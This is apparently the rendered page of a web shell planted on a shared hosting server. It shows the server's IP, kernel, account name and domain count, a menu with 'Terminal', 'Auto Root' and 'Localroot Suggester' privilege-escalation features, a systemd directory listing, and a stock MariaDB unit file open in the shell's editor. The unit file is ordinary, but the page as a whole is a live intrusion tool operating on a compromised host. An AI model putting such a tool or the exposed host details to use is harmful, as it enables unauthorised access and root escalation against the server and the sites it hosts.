Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
systemd /
system /
multi-user.target.wants /
Delete
Unzip
Name
Size
Permission
Date
Action
NetworkManager.service
1.36
KB
-rw-r--r--
2026-08-24 11:49
atd.service
274
B
-rw-r--r--
2025-11-12 00:38
auditd.service
1.98
KB
-rw-r--r--
2026-04-04 20:12
cagefs.service
705
B
-rw-r--r--
2026-07-31 12:29
chronyd.service
1.43
KB
-rw-r--r--
2026-04-09 00:49
clwpos_monitoring.service
679
B
-rw-r--r--
2026-09-04 11:38
cpanel-onboot.service
684
B
-rw-r--r--
2026-09-04 10:22
cpanel.service
716
B
-rw-r--r--
2026-09-04 10:22
cpanelquotaonboot.service
324
B
-rw-r--r--
2026-09-04 10:22
cpipv6.service
548
B
-rw-r--r--
2026-09-04 10:28
crond.service
371
B
-rw-r--r--
2026-04-09 05:59
db_governor.service
536
B
-rw-r--r--
2026-08-06 17:01
dovecot.service
362
B
-rw-r--r--
2026-07-13 00:00
ea-php70-php-fpm.service
716
B
-rw-r--r--
2026-09-03 08:44
ea-php72-php-fpm.service
716
B
-rw-r--r--
2026-09-03 09:06
ea-php73-php-fpm.service
716
B
-rw-r--r--
2026-09-03 09:15
ea-php81-php-fpm.service
716
B
-rw-r--r--
2026-08-18 19:37
ea-php82-php-fpm.service
716
B
-rw-r--r--
2026-08-06 21:25
exim.service
427
B
-rw-r--r--
2026-07-24 13:18
fastmail.service
316
B
-rw-r--r--
2026-09-04 10:28
httpd.service
608
B
-rw-r--r--
2026-06-10 15:51
ipaliases.service
654
B
-rw-r--r--
2026-09-04 10:34
irqbalance.service
1.04
KB
-rw-r--r--
2026-04-08 16:39
lshttpd.service
658
B
-rw-r--r--
2026-09-04 10:51
lve.service
465
B
-rw-r--r--
2026-06-16 09:25
lve_namespaces.service
416
B
-rw-r--r--
2026-07-29 13:24
lvectl.service
497
B
-rw-r--r--
2026-07-29 13:24
lvestats.service
398
B
-r--r--r--
2026-06-23 08:44
mailman.service
248
B
-rw-r--r--
2026-05-02 18:41
mariadb.service
5.45
KB
-rw-r--r--
2026-08-19 09:31
nfs-client.target
433
B
-rw-r--r--
2026-04-08 16:14
nftables.service
393
B
-rw-r--r--
2026-08-26 12:05
nscd.service
512
B
-rw-r--r--
2026-08-03 10:13
pdns.service
1.49
KB
-rw-r--r--
2026-08-10 19:13
proxyexecd.service
353
B
-rw-r--r--
2026-07-31 12:29
remote-fs.target
530
B
-rw-r--r--
2022-10-31 18:59
rpcbind.service
544
B
-rw-r--r--
2024-04-03 13:53
rsyslog.service
999
B
-rw-r--r--
2026-04-14 15:35
securetmp.service
352
B
-rw-r--r--
2026-09-04 09:56
smartd.service
334
B
-rw-r--r--
2026-04-08 20:37
ssa-agent.service
1.83
KB
-rw-r--r--
2026-07-24 11:40
sshd.service
372
B
-rw-r--r--
2026-07-29 23:09
sssd.service
768
B
-rw-r--r--
2026-07-23 19:31
sysstat.service
475
B
-rw-r--r--
2026-04-15 10:16
tuned.service
439
B
-rw-r--r--
2026-02-22 19:49
xray-agent.service
277
B
-rw-r--r--
2026-08-05 18:28
Save
Rename
# It's not recommended to modify this file in-place, because it will be # overwritten during package upgrades. If you want to customize, the # best way is to create a file "/etc/systemd/system/mariadb.service", # containing # .include /usr/lib/systemd/system/mariadb.service # ...make your changes here... # or create a file "/etc/systemd/system/mariadb.service.d/foo.conf", # which doesn't need to include ".include" call and which will be parsed # after the file mariadb.service itself is parsed. # # For more info about custom unit files, see systemd.unit(5) or # https://mariadb.com/docs/server/server-management/starting-and-stopping-mariadb/systemd # # Copyright notice: # # This file is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=MariaDB 10.11.19 database server Documentation=man:mariadbd(8) Documentation=https://mariadb.com/docs/server/server-management/starting-and-stopping-mariadb/systemd After=network.target [Install] WantedBy=multi-user.target [Service] ############################################################################## ## Core requirements ## Type=notify # Setting this to true can break replication and the Type=notify settings # See also bind-address mariadbd option. PrivateNetwork=false ############################################################################## ## Package maintainers ## User=mysql Group=mysql # CAP_IPC_LOCK To allow memlock to be used as non-root user # These are enabled by default AmbientCapabilities=CAP_IPC_LOCK # Prevent writes to /usr, /boot, and /etc ProtectSystem=full # Doesn't yet work properly with SELinux enabled # NoNewPrivileges=true # Restrict modifications of cgroups from the MariaDB service context. ProtectControlGroups=true # Prevent accessing /home, /root and /run/user ProtectHome=true # Use an environment file to pass variable _WSREP_NEW_CLUSTER. # Must not be writable by mysql user. EnvironmentFile=-/run/mariadb-wsrep-new-cluster # Needed to create system tables etc. # ExecStartPre=/usr/bin/mariadb-install-db # Start main service # MYSQLD_OPTS here is for users to set in /etc/systemd/system/mariadb.service.d/MY_SPECIAL.conf # Use the [Service] section and Environment="MYSQLD_OPTS=...". # This isn't a replacement for my.cnf. # _WSREP_NEW_CLUSTER is for the exclusive use of the script galera_new_cluster # # Perform automatic wsrep recovery. When server is started without wsrep, # galera_recovery simply returns an empty string. In any case, however, it is # not expected to return a non-zero status. ExecStart=/bin/sh -c "set -f; [ ! -e /usr/bin/galera_recovery ] && VAR= || \ VAR=`/usr/bin/galera_recovery`; [ $? -eq 0 ] || exit 1; \ exec /usr/sbin/mariadbd $MYSQLD_OPTS $_WSREP_NEW_CLUSTER $VAR" # have to set the name explicitly now, otherwise it'll be the # first name from ExecStart SyslogIdentifier=mariadbd KillSignal=SIGTERM # Don't want to see an automated SIGKILL ever SendSIGKILL=no # Restart crashed server only, on-failure would also restart, for example, when # my.cnf contains unknown option Restart=on-abnormal RestartSec=5s UMask=007 ############################################################################## ## USERs can override ## ## ## by creating a file in /etc/systemd/system/mariadb.service.d/MY_SPECIAL.conf ## and adding/setting the following under [Service] will override this file's ## settings. # Useful options not previously available in [mysqld_safe] # Kernels like killing mariadbd when out of memory because its big. # Lets temper that preference a little. # OOMScoreAdjust=-600 # Explicitly start with high IO priority # BlockIOWeight=1000 # If you don't use the /tmp directory for SELECT ... OUTFILE and # LOAD DATA INFILE you can enable PrivateTmp=true for a little more security. PrivateTmp=false # Set an explicit Start and Stop timeout of 900 seconds (15 minutes!) # this is the same value as used in SysV init scripts in the past # Galera might need a longer timeout, check the KB if you want to change this: # https://mariadb.com/docs/server/server-management/starting-and-stopping-mariadb/systemd TimeoutStartSec=900 TimeoutStopSec=900 # Set the maximium number of tasks (threads) to 99% of what the system can # handle as set by the kernel, reserve the 1% for a remote ssh connection, # some monitoring, or that backup cron job. Without the directive this would # be 15% (see DefaultTasksMax in systemd man pages). TasksMax=99% ## ## Options previously available to be set via [mysqld_safe] ## that now needs to be set by systemd config files as mysqld_safe ## isn't executed. ## # Number of files limit. previously [mysqld_safe] open-files-limit LimitNOFILE=32768 # For liburing and io_uring_setup() LimitMEMLOCK=524288 # Maximium core size. previously [mysqld_safe] core-file-size # LimitCore= # Nice priority. previously [mysqld_safe] nice # Nice=-5 # Timezone. previously [mysqld_safe] timezone # Environment="TZ=UTC" # Library substitutions. previously [mysqld_safe] malloc-lib with explicit paths # (in LD_LIBRARY_PATH) and library name (in LD_PRELOAD). # Environment="LD_LIBRARY_PATH=/path1 /path2" "LD_PRELOAD=" # Flush caches. previously [mysqld_safe] flush-caches=1 # ExecStartPre=sync # ExecStartPre=sysctl -q -w vm.drop_caches=3 # numa-interleave=1 equalivant # Change ExecStart=numactl --interleave=all /usr/sbin/mariadbd...... # crash-script equalivent # FailureAction=